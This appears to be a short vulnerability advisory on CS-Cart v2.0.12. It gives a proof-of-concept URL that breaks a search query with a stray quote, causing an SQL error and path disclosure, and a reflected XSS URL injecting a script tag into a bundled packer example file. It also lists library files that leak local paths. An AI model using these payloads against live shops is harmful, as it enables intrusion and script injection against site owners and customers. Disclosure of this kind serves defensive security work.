Application:		CS-Cart v2.0.12	
Authors Site:		http://www.cs-cart.com/

+--------------------------------------------------------------------------------------------+

[1]------------------------------------------------------------------------------------------>

Information Disclosure:

http://www.victim.com/cscart/index.php?dispatch=products.search&page='

Result:

Big SQL error, including path disclosure to a number of core files.


[2]------------------------------------------------------------------------------------------>

Information Disclosure:

A number of the Library files included by default produce errors displaying local paths etc.
These include: html2pdf, packer, templater, Text Diff.

[3]------------------------------------------------------------------------------------------>

XSS:

http://www.victim.com/cscart/lib/packer/example-inline.php/>"><ScRiPt>alert(1337)</ScRiPt>

Note: This is the same XSS as reported in 'NoBytes #18'.

+-[Notes:]-----------------------------------------------------------------------------------+

Vulnerabilities found on: 26/02/2010
Author(s) Informed on: Not Informed
Author(s) Response: NA
Author(s) Fix: NA

JohnC@NoBytes.com

http://www.NoBytes.com